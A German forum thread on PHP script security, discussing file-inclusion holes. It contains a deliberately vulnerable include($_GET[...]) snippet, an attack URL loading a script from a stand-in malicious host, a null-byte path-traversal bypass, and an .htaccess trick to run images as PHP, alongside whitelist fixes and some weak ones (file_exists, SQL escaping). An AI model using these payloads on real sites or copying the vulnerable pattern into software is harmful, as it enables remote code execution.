Sicherheit in PHP Scripten



  • Nordin schrieb:

    Sollte jemand Interesse haben es weiter zu entwickeln oder möchte es jemand betreuen kann er gern bescheid geben.

    Bescheid. Ich wuerde mir gern mal den Quelltext ansehen und schauen, ob ich etwas verbessern / ausbauen kann. Ansonsten wuerde ich mich - sollte mich das Produkt ueberzeugen - mal ans Marketing heranmachen wollen. Dann allerdings gemeinsam, nicht alleine.



  • Ja genau, so findest du ebenfalls aber tausende quellen.

    Kannst auch nach "sql injection" googlen.
    Oder auch bei wikipedia schauen: http://de.wikipedia.org/wiki/SQL-Injection



  • @heini
    Ich freu mich! Wenn du wirklich interesse hast wäre das super!
    Kannst du dich bitte dort registrieren. Sag mir bescheid wenn du registriert bist. Ich melde mich dann bei dir per email oder PN. (Hier ist es ja scheinbar nicht möglich.)

    Wir können uns auch gern über einen Messenger unterhalten. Kann dir mit MSN oder Skype dienen. Ggf. können wir auch mal telefonieren. Mir liegt wirklich sehr viel an diesem Projekt nur leider kann ich es nicht weiter entwikeln weil mir die zeit fehlt 😞

    Gruß Nordin



  • Nordin schrieb:

    Sag mir bescheid wenn du registriert bist. Ich melde mich dann bei dir per email oder PN.

    Bescheid. Pseudonym: Euclid



  • seq schrieb:

    oops hab was vergessen sry.

    So sieht der Verwundbare Code aus:

    <?php
    if (isset($_GET['vulnvar']))
    	{
    	include ($_GET['vulnvar']);
    	}
    
    	else
    	{
    	echo "kein wert bekommen";
    	}
    
    ?>
    

    Was bewirkt denn dieser Code? (/me = PHP Anfänger)



  • Cpp_Junky schrieb:

    seq schrieb:

    So sieht der Verwundbare Code aus:

    <?php
    if (isset($_GET['vulnvar']))
    	{
    	include ($_GET['vulnvar']);
    	}
    
    	else
    	{
    	echo "kein wert bekommen";
    	}
    
    ?>
    

    Was bewirkt denn dieser Code? (/me = PHP Anfänger)

    wenn (existiert die variable vulnvar als übergabe (an die url angehängt))
    dann includiere das, was vulnvar mitgebracht hat.

    schön, da kann man dann alle möglichen seiten einbinden.



  • Hallo,

    das die im GET-Parameter 'vulnvar' angegebene Seite in das aktuelle PHP-Script eingebunden wird!

    // URL = meineurl.de/index.php?vulnvar=test.php
    

    index.php:

    include ($_GET['vulnvar']);
    // ergibt:
    echo("Test"); // aus test.php
    

    test.php:

    echo("Test");
    

    //Edit: Zu langsam

    LG, Micha



  • Hm, es gibt das sogar oft:

    http://www.google.de/search?hl=de&q=include+(%24_GET[&meta=

    Gleich der erste Link zeigt ein Fallbeispiel bei selfhtml für Navigation... das werden viele Leute kopiert haben.



  • OMG, das ist allerdings wirklich krank 😮



  • Ja das ist ja auch nicht schlimm, nur muss man eben überprüfen ob das übergebene in der URL auch das ist was ich gesendet habe.

    Wenn ich

    meineurl.de/index.php?vulnvar=test.php
    

    sende, soll das ja auch an komemn damit meine test.php eingebunden wird.

    Aber es kann jetzt auch jemand folgendes machen:

    meineurl.de/index.php?vulnvar=http://böse-seite.com/böses-script.txt
    

    Schon wird nicht mehr meine test.php eingebunden sondern ein böser schadecode 😉

    Darum muss ich prüfen ob "vulnvar" auch das von mir übergebene "test.php" entählt.
    (An die spezialisten: wie man jetzt prüft ist erstmal nebensächlich.)



  • Hallo,

    php_info() aufrufen und schauen ob allow_url_include auf on gesetzt ist! Sollte dies der Fall sein ist die Sicherheitslücke offen. In dem Fall sollte allow_url_include auf off gesetzt werden => php.ini

    Sollte dies aus irgend einem Grund nicht machbar sein, einfach mittels file_exists() prüfen. Soweit ich weiß ist file_exists() Serverübergreifend nicht möglich und gibt somit false zurück...

    if (file_exists($_GET['vulnvar']))
       include($_GET['vulnvar']);
    else
       echo("Error");
    

    LG, Micha



  • RandomAccess85 schrieb:

    Hallo,

    php_info() aufrufen und schauen ob allow_url_include auf on gesetzt ist! Sollte dies der Fall sein ist die Sicherheitslücke offen. In dem Fall sollte allow_url_include auf off gesetzt werden => php.ini

    Sollte dies aus irgend einem Grund nicht machbar sein, einfach mittels file_exists() prüfen. Soweit ich weiß ist file_exists() Serverübergreifend nicht möglich und gibt somit false zurück...

    if (file_exists($_GET['vulnvar']))
       include($_GET['vulnvar']);
    else
       echo("Error");
    

    LG, Micha

    Guter Vorschlag, gibt aber ein paar kleine haken:
    - aus erfahrung weiß ich das 70% der user nicht an die php.ini rannkommen
    - allow_url_inlude() ist erst ab PHP Version 5.2.0 verfügbar

    Im Falle das der übergebene Parameter eine zu includierende Datei ist, denke ich die meisten sollten es so machen wie du sagst, mittels file_exsist prüfen ob die übergebene datei existiert und gut.



  • RandomAccess85 schrieb:

    Hallo,

    Sollte dies aus irgend einem Grund nicht machbar sein, einfach mittels file_exists() prüfen. Soweit ich weiß ist file_exists() Serverübergreifend nicht möglich und gibt somit false zurück...

    if (file_exists($_GET['vulnvar']))
       include($_GET['vulnvar']);
    else
       echo("Error");
    

    LG, Micha

    stellen wir uns vor, dass ein angreifer ein Bild auf den server upgeloadet hat in dem eigentlich im klartext phpcode steht.
    Ab jetzt wird eine include von einem lokalem file eine Katastrophe bedeuten und file_exists wird uns nicht ausreichen.



  • einfache Lösung:

    http://www.example.com/index.php?include=test

    include( "/includes/" + $_GET['include'] + ".php" );
    


  • Hallo,

    dafür gibt es Funktionen die beim Upload genutzt werden können um zu prüfen ob es sich bei der angegebenen Datei tatsächlich um ein Bild handelt.

    siehe hier

    oder:

    $_FILES['datei']['type'] // gibt ebenfalls der mime-type zurück
    

    Sollte man trotzdem noch Angst vor Angriffen aus dieser Richtung haben, verzichtet man einfach auf diese Art und Weise und[h]schafft sich lieber eine anständige Datenbank und spielt mit den ID's

    LG, Micha



  • für mich scheint der Vorschlag von @zwutz als sicher zu sein, da er wenigstens ein vordefinierter Ordner, wo die erlaubte scripts liegen als auch richtige Erweiterung einbindet.

    Die Upload-Datein müssen natürlich um jeden preis wenigsten auf Type an Hand von Erweiterung untersucht werden zbs viel schlimmer als ein bild mit PHP-Code könnte einfache .htaccess datei sein in der erlaubt wird eine Bilddatei als PHP-Script direkt auszuführen (AddType ....).



  • zwutz schrieb:

    einfache Lösung:

    http://www.example.com/index.php?include=test

    include( "/includes/" + $_GET['include'] + ".php" );
    

    Ja, einfach ... zu umgehen:

    Wenn der String ein Zerobyte enthält, erkennt PHP (mit C als Unterbau) ein angebliches Ende der Zeichenkette. Ist $_GET['include'] = "../pwd\0" , wird das ".php" am Ende abgeschnitten und /pwd inkludiert.

    Grundlegendes Sicherheitsprinzip:
    Arbeite niemals mit Blacklists, sondern immer mit Whitelists.

    key = $_GET['include']
    wl = array( 'index', 'help', 'impressum', 'products', ...)
    if not in array(key, wl) {
     die
    }
    


  • Grundlegendes Sicherheitsprinzip:
    Arbeite niemals mit Blacklists, sondern immer mit Whitelists.

    Mein reden... sagte ich bereits in meinem ersten Beitrag 😉

    Nordin schrieb:

    Fazit:
    IMMER GET und POST prüfen!

    Man sollte sich als jedes mal die Mühe machen und prüfen ob der übergebene Wert auch erlaubt ist bzw. existiert.

    In dem Beispiel von seq wäre es dann so richtig:
    (Es soll zb. die Datei home.php aufgerufen werden.)

    <?php
    if (isset($_GET['vulnvar']) AND $_GET['vulnvar'] == 'home')
        {
        include ('home.php');
        }
    
        else
        {
        echo "kein wert bekommen";
        }
    
    ?>
    

    Aber umm dein Beispiel mal als funktionstüchtigen PHP-Code zu machen:

    $key = $_GET['include'];
    $wl = array( 'index', 'help', 'impressum', 'products');
    if (!in_array($key, $wl)) {
    	die('Seite existiert nicht');
    }
    


  • árn[y]ék schrieb:

    zwutz schrieb:

    einfache Lösung:

    http://www.example.com/index.php?include=test

    include( "/includes/" + $_GET['include'] + ".php" );
    

    Ja, einfach ... zu umgehen:

    ich bin leider nicht stark in "C" (7 Jahren mit PHP beschäftigt) und würde gerne auf eine kleine programm mit quellcode freuen, die diese Aussage testen lässt (sicherheitslücken darf ich auf keinen Fall ignorieren).
    In jedem Fall muss ich das auf dem localhost ansprechen können mit der echter GET-Variable, die \0 über http bekommt.
    Natürlich werde ich dann auch '+' durch '.' ersetzen, um die Richtige verkettung zu bekommen 🙂 .



  • árn[y]ék schrieb:

    zwutz schrieb:

    einfache Lösung:

    http://www.example.com/index.php?include=test

    include( "/includes/" + $_GET['include'] + ".php" );
    

    Ja, einfach ... zu umgehen:

    hab nochmal meinen Code durchgesehen, da das dann doch schon ein weilchen her ist...

    Ich kann dich beruhigen, ich hab vorgesorgt 😉

    zuerst jage ich die Variable durch mysql_real_escape_string und wende sie auf eine whitelist an ^^


Anmelden zum Antworten